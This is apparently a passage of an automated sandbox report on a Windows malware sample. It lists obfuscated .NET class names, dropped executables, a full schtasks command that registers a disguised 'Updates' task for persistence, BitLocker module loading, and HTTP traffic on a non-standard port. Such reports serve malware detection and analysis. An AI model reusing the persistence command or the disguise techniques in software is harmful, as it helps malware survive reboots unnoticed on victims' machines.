Source: 7.2.PO.exe.7500000.7.raw.unpack, jsZrdcXjl1uQRqsAmCA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eP3WtPjbth', 'u5PWgiBP9F', 'jS7WkXqpW7', 'wieW8OqtVD', 'BliWsFph5g', 'WqMW2DmGNC', 'f3uWqc984l'
Source: 7.2.PO.exe.7500000.7.raw.unpack, EZIQHCEbc1PaX9Yb1N.cs	High entropy of concatenated method names: 'VdkMX3Swpu', 'YXwMjQmwEJ', 'MUxMvxuQXa', 'JpjM3TuveX', 'OuyM1BbOtN', 'OrjMcG3AW3', 'D8PMYcspNM', 'OhJRqFjmO9', 'u0oRPfhnor', 'iVgRra9dkl'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, RweiFQ8MNVqb7kU3qP.cs	High entropy of concatenated method names: 'jSqyx8fSBd', 'A41yCp0K6R', 'ToString', 'w4fy3q05Db', 'jU2y1ngNhh', 'kZgyUhWV0S', 'PBaycnNhYC', 'hODyYXUcJX', 'wkxy76mi1A', 'wQeyQGwGrq'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, LKQT68mH5ASHthJwl3.cs	High entropy of concatenated method names: 'hdNJAM6wC7', 'MksJ64gGyW', 'aXvJG8IDAW', 'wuAJwlH512', 'KdbJZoOywH', 'NY2JOvRyLh', 'mZjJuYIxhT', 'nW5JVTTTNu', 'l8TJnANFOX', 'vcUJDLQ0dI'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, DgMo1a2TEnBVuP9N9q.cs	High entropy of concatenated method names: 'mgOyPih1ab', 'wF2yEVJpLK', 'sDNR4wS2Un', 'f6xRXlQseZ', 'vWDyDVtyQ6', 'L2yy0h3Hnv', 'UZQymixqZR', 'H10ytw8doO', 'i7SygBVJxq', 'PeTyk2EmFt'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, x3jKeUAdnBO4kHagia.cs	High entropy of concatenated method names: 'd4i1td3XwD', 'eaf1gosTFY', 'tWW1koOaXv', 'hiD189ZWv6', 'kGi1sJd5Lg', 'Pmb126vSLo', 'PFs1qNrinI', 'tdo1Po6afc', 'FqO1rxc7un', 'Mgl1E4aAZM'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, BcPGxJGNwBKAHLOZ5B.cs	High entropy of concatenated method names: 'WSyYpAJOyI', 'TE6Y1kYrEl', 'EXDYcF7Rqh', 'RCVY78qk4x', 'zv4YQ91o7S', 'AJlcsOZwLV', 'JW8c2tZYXs', 'tDxcqkSLic', 'wxJcPRWv01', 'CwZcrlJ3VV'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, DN1BMmUSUujPnlpeUe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TvWLrFLTsu', 'qcsLEHEbid', 'SB7LzW5q1B', 'Mtsj4RkLWC', 'VBhjXS8bJN', 'P9wjLBx7o7', 'EgpjjJDpK7', 'RxNZgl4Irbd6PbUn9ni'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, eiSH7gzGM2qUasCfST.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbVMJEZEYQ', 'aoyMb9sZbR', 'VZoMea5cuH', 'YQ6MytHiSY', 'DDeMRqZgA5', 'wLPMMn3MQ7', 'AQEMWhaliT'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, OXOCYHtTvwly4MyDvr.cs	High entropy of concatenated method names: 'OSpbn7OWGX', 'JKjb0evbRq', 'aExbtwro56', 'LYZbgpvCrI', 'Nekbw7nYsf', 'I5Qb5d8Hiy', 'nCobZgEf90', 'JQBbOHf9Pe', 'hQIba2mfqf', 'T1EbusIVWx'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, UcoK1FuF7y8QYluRJb.cs	High entropy of concatenated method names: 'QL473lh3MT', 'GBu7UpGCZ7', 'eAM7Y9TSc4', 'Qa2YE8lWLd', 'HqtYz2n4Fu', 'gkB74jwsIX', 'Rwh7XHnY6s', 'uId7LmCSnW', 'VIe7jc3kcc', 'k0R7vcAG8q'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, Gov6glwCQ97H0Limap.cs	High entropy of concatenated method names: 'VuIG52oSRQeseG4Mn2S', 'GlXTSqoD9V3brRrr2OQ', 'uq3bGBoLvTrZu9Cr1o6', 'GkkYR3UgYE', 'Jw2YMlS89Y', 'v9yYWL7S66', 'Xj8jsCo0i4wgrGl7P2J', 'X0QvNxoJ5yEiaHtlmqU'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.cs	High entropy of concatenated method names: 'LoTjpQ6gm0', 'H5Dj3Glilr', 'Wvgj1U7ZrV', 'EwRjUJrAfJ', 'tgpjc4WWQK', 'JWhjYEatKA', 'yisj7re6Cn', 'aFwjQDXJ6W', 'EY9jioN6jG', 'toQjxSAuK1'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, B2Ep1wrKg8qEfTObHH.cs	High entropy of concatenated method names: 'PjpRGnFayt', 'e5aRwmAd3B', 'aLPR5v1ZeO', 'BRtRZIUA8O', 'SKkRtGRB3V', 'fEGROaOWxa', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, mBUeiAkjcrgNLlTDqo.cs	High entropy of concatenated method names: 'ToString', 'x8leDYyk1d', 'fanewSqf8H', 'ICUe59hlfc', 'uMdeZXqNUL', 'LaVeOH735h', 'QxNeamDkG4', 'Fpbeu8vZ3N', 'U3keVVD1h0', 'ovGeTjW7PX'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, I9emTW1si3A509cO3Q.cs	High entropy of concatenated method names: 'Dispose', 'h6AXrSWDNA', 'j9JLwyc7oe', 'H9qffBn4X4', 'Dr7XEyD28H', 'EDpXzQUWbI', 'ProcessDialogKey', 'oSKL42Ep1w', 'Bg8LXqEfTO', 'oHHLL6ZIQH'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, Y7yD28PH6DpQUWbIbS.cs	High entropy of concatenated method names: 'o1eR3kU3kg', 'ufnR1s1dq2', 'SPXRUifJEn', 'agdRcpL6R8', 'jT6RYAmEpE', 'W1qR7eXgLu', 'i9DRQHj4QV', 'Vj3Riu7y1a', 'hQtRxMWpWc', 'oldRC69IXN'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, htcMop69blRljZCVu8.cs	High entropy of concatenated method names: 'E8BUBK0qTJ', 'IH1USyhZn5', 'P8lUAcYIbw', 'URUU6NeM6h', 'pM9UbWPbyw', 'gr3UefmcYE', 'WwWUyHuJed', 'JBqURnCNZy', 'kZLUM5wJBd', 'HoZUW638p7'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, kB1m3iLkQwbft8i78e.cs	High entropy of concatenated method names: 'kR69R5CMS', 'WpCBIMyj8', 'iHuSnKcVp', 'eZ2hlR9Go', 'So76utccw', 'R4edmi8Ny', 'fhRqvwyWuxLCkWGH9Z', 'iSm30QC0X5lFtUgo9H', 'd0XRTetyR', 'S0jWJdMsR'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, NRIjW9Tc0VVQBypkJ3.cs	High entropy of concatenated method names: 'kvI7oIDyyS', 't8Y7N7Jo72', 'aIo79EToFP', 'Fne7BOZmJ4', 'AVV7KSV51w', 'RdT7SedPVd', 'Fny7hHAc7N', 'flI7A6chGO', 'yES76s7JhA', 'j8R7dmoFU0'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, PRxlWidxa1R4F3MMQC.cs	High entropy of concatenated method names: 'C3ycKA7fKo', 'vLlchqxXgE', 'Wq6U5tSWpq', 'rQVUZ2iuNe', 'aWOUOew3VU', 'cbCUaeabhy', 'kgZUu99wFF', 'pSuUVParlW', 'QfJUTYPs7C', 'gFIUn9L3V8'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, ci7MkkvfGKgms55ENS.cs	High entropy of concatenated method names: 'FEoX73jKeU', 'FnBXQO4kHa', 'e9bXxlRljZ', 'nVuXC80Rxl', 'fMMXbQCScP', 'GxJXeNwBKA', 'eYSb8ZNOmDmuQd0ehj', 'CaXEPP2XPThNe5eC4E', 'pvIXX9CopU', 'O3tXjvxuBm'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, To5JpVX4YjBwk1ElpU2.cs	High entropy of concatenated method names: 'KtnMoYck7s', 'wWSMNkp0nZ', 'svIM9Z8I04', 'HWuMBEIEB8', 'O6pMKyU2S7', 'oNkMSxtEIs', 'QGZMhZSZT6', 'SflMAO0Htg', 'EfMM6hiHum', 'ci4Mdm7B7N'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, jsZrdcXjl1uQRqsAmCA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eP3WtPjbth', 'u5PWgiBP9F', 'jS7WkXqpW7', 'wieW8OqtVD', 'BliWsFph5g', 'WqMW2DmGNC', 'f3uWqc984l'
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, EZIQHCEbc1PaX9Yb1N.cs	High entropy of concatenated method names: 'VdkMX3Swpu', 'YXwMjQmwEJ', 'MUxMvxuQXa', 'JpjM3TuveX', 'OuyM1BbOtN', 'OrjMcG3AW3', 'D8PMYcspNM', 'OhJRqFjmO9', 'u0oRPfhnor', 'iVgRra9dkl'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, RweiFQ8MNVqb7kU3qP.cs	High entropy of concatenated method names: 'jSqyx8fSBd', 'A41yCp0K6R', 'ToString', 'w4fy3q05Db', 'jU2y1ngNhh', 'kZgyUhWV0S', 'PBaycnNhYC', 'hODyYXUcJX', 'wkxy76mi1A', 'wQeyQGwGrq'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, LKQT68mH5ASHthJwl3.cs	High entropy of concatenated method names: 'hdNJAM6wC7', 'MksJ64gGyW', 'aXvJG8IDAW', 'wuAJwlH512', 'KdbJZoOywH', 'NY2JOvRyLh', 'mZjJuYIxhT', 'nW5JVTTTNu', 'l8TJnANFOX', 'vcUJDLQ0dI'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, DgMo1a2TEnBVuP9N9q.cs	High entropy of concatenated method names: 'mgOyPih1ab', 'wF2yEVJpLK', 'sDNR4wS2Un', 'f6xRXlQseZ', 'vWDyDVtyQ6', 'L2yy0h3Hnv', 'UZQymixqZR', 'H10ytw8doO', 'i7SygBVJxq', 'PeTyk2EmFt'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, x3jKeUAdnBO4kHagia.cs	High entropy of concatenated method names: 'd4i1td3XwD', 'eaf1gosTFY', 'tWW1koOaXv', 'hiD189ZWv6', 'kGi1sJd5Lg', 'Pmb126vSLo', 'PFs1qNrinI', 'tdo1Po6afc', 'FqO1rxc7un', 'Mgl1E4aAZM'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, BcPGxJGNwBKAHLOZ5B.cs	High entropy of concatenated method names: 'WSyYpAJOyI', 'TE6Y1kYrEl', 'EXDYcF7Rqh', 'RCVY78qk4x', 'zv4YQ91o7S', 'AJlcsOZwLV', 'JW8c2tZYXs', 'tDxcqkSLic', 'wxJcPRWv01', 'CwZcrlJ3VV'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, DN1BMmUSUujPnlpeUe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TvWLrFLTsu', 'qcsLEHEbid', 'SB7LzW5q1B', 'Mtsj4RkLWC', 'VBhjXS8bJN', 'P9wjLBx7o7', 'EgpjjJDpK7', 'RxNZgl4Irbd6PbUn9ni'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, eiSH7gzGM2qUasCfST.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbVMJEZEYQ', 'aoyMb9sZbR', 'VZoMea5cuH', 'YQ6MytHiSY', 'DDeMRqZgA5', 'wLPMMn3MQ7', 'AQEMWhaliT'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, OXOCYHtTvwly4MyDvr.cs	High entropy of concatenated method names: 'OSpbn7OWGX', 'JKjb0evbRq', 'aExbtwro56', 'LYZbgpvCrI', 'Nekbw7nYsf', 'I5Qb5d8Hiy', 'nCobZgEf90', 'JQBbOHf9Pe', 'hQIba2mfqf', 'T1EbusIVWx'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, UcoK1FuF7y8QYluRJb.cs	High entropy of concatenated method names: 'QL473lh3MT', 'GBu7UpGCZ7', 'eAM7Y9TSc4', 'Qa2YE8lWLd', 'HqtYz2n4Fu', 'gkB74jwsIX', 'Rwh7XHnY6s', 'uId7LmCSnW', 'VIe7jc3kcc', 'k0R7vcAG8q'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, Gov6glwCQ97H0Limap.cs	High entropy of concatenated method names: 'VuIG52oSRQeseG4Mn2S', 'GlXTSqoD9V3brRrr2OQ', 'uq3bGBoLvTrZu9Cr1o6', 'GkkYR3UgYE', 'Jw2YMlS89Y', 'v9yYWL7S66', 'Xj8jsCo0i4wgrGl7P2J', 'X0QvNxoJ5yEiaHtlmqU'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.cs	High entropy of concatenated method names: 'LoTjpQ6gm0', 'H5Dj3Glilr', 'Wvgj1U7ZrV', 'EwRjUJrAfJ', 'tgpjc4WWQK', 'JWhjYEatKA', 'yisj7re6Cn', 'aFwjQDXJ6W', 'EY9jioN6jG', 'toQjxSAuK1'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, B2Ep1wrKg8qEfTObHH.cs	High entropy of concatenated method names: 'PjpRGnFayt', 'e5aRwmAd3B', 'aLPR5v1ZeO', 'BRtRZIUA8O', 'SKkRtGRB3V', 'fEGROaOWxa', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, mBUeiAkjcrgNLlTDqo.cs	High entropy of concatenated method names: 'ToString', 'x8leDYyk1d', 'fanewSqf8H', 'ICUe59hlfc', 'uMdeZXqNUL', 'LaVeOH735h', 'QxNeamDkG4', 'Fpbeu8vZ3N', 'U3keVVD1h0', 'ovGeTjW7PX'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, I9emTW1si3A509cO3Q.cs	High entropy of concatenated method names: 'Dispose', 'h6AXrSWDNA', 'j9JLwyc7oe', 'H9qffBn4X4', 'Dr7XEyD28H', 'EDpXzQUWbI', 'ProcessDialogKey', 'oSKL42Ep1w', 'Bg8LXqEfTO', 'oHHLL6ZIQH'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, Y7yD28PH6DpQUWbIbS.cs	High entropy of concatenated method names: 'o1eR3kU3kg', 'ufnR1s1dq2', 'SPXRUifJEn', 'agdRcpL6R8', 'jT6RYAmEpE', 'W1qR7eXgLu', 'i9DRQHj4QV', 'Vj3Riu7y1a', 'hQtRxMWpWc', 'oldRC69IXN'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, htcMop69blRljZCVu8.cs	High entropy of concatenated method names: 'E8BUBK0qTJ', 'IH1USyhZn5', 'P8lUAcYIbw', 'URUU6NeM6h', 'pM9UbWPbyw', 'gr3UefmcYE', 'WwWUyHuJed', 'JBqURnCNZy', 'kZLUM5wJBd', 'HoZUW638p7'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, kB1m3iLkQwbft8i78e.cs	High entropy of concatenated method names: 'kR69R5CMS', 'WpCBIMyj8', 'iHuSnKcVp', 'eZ2hlR9Go', 'So76utccw', 'R4edmi8Ny', 'fhRqvwyWuxLCkWGH9Z', 'iSm30QC0X5lFtUgo9H', 'd0XRTetyR', 'S0jWJdMsR'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, NRIjW9Tc0VVQBypkJ3.cs	High entropy of concatenated method names: 'kvI7oIDyyS', 't8Y7N7Jo72', 'aIo79EToFP', 'Fne7BOZmJ4', 'AVV7KSV51w', 'RdT7SedPVd', 'Fny7hHAc7N', 'flI7A6chGO', 'yES76s7JhA', 'j8R7dmoFU0'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, PRxlWidxa1R4F3MMQC.cs	High entropy of concatenated method names: 'C3ycKA7fKo', 'vLlchqxXgE', 'Wq6U5tSWpq', 'rQVUZ2iuNe', 'aWOUOew3VU', 'cbCUaeabhy', 'kgZUu99wFF', 'pSuUVParlW', 'QfJUTYPs7C', 'gFIUn9L3V8'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, ci7MkkvfGKgms55ENS.cs	High entropy of concatenated method names: 'FEoX73jKeU', 'FnBXQO4kHa', 'e9bXxlRljZ', 'nVuXC80Rxl', 'fMMXbQCScP', 'GxJXeNwBKA', 'eYSb8ZNOmDmuQd0ehj', 'CaXEPP2XPThNe5eC4E', 'pvIXX9CopU', 'O3tXjvxuBm'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, To5JpVX4YjBwk1ElpU2.cs	High entropy of concatenated method names: 'KtnMoYck7s', 'wWSMNkp0nZ', 'svIM9Z8I04', 'HWuMBEIEB8', 'O6pMKyU2S7', 'oNkMSxtEIs', 'QGZMhZSZT6', 'SflMAO0Htg', 'EfMM6hiHum', 'ci4Mdm7B7N'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, jsZrdcXjl1uQRqsAmCA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eP3WtPjbth', 'u5PWgiBP9F', 'jS7WkXqpW7', 'wieW8OqtVD', 'BliWsFph5g', 'WqMW2DmGNC', 'f3uWqc984l'
Source: 7.2.PO.exe.43feae0.1.raw.unpack, EZIQHCEbc1PaX9Yb1N.cs	High entropy of concatenated method names: 'VdkMX3Swpu', 'YXwMjQmwEJ', 'MUxMvxuQXa', 'JpjM3TuveX', 'OuyM1BbOtN', 'OrjMcG3AW3', 'D8PMYcspNM', 'OhJRqFjmO9', 'u0oRPfhnor', 'iVgRra9dkl'

Source: C:\Users\user\Desktop\owKQ0b029a.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File created: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49723

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
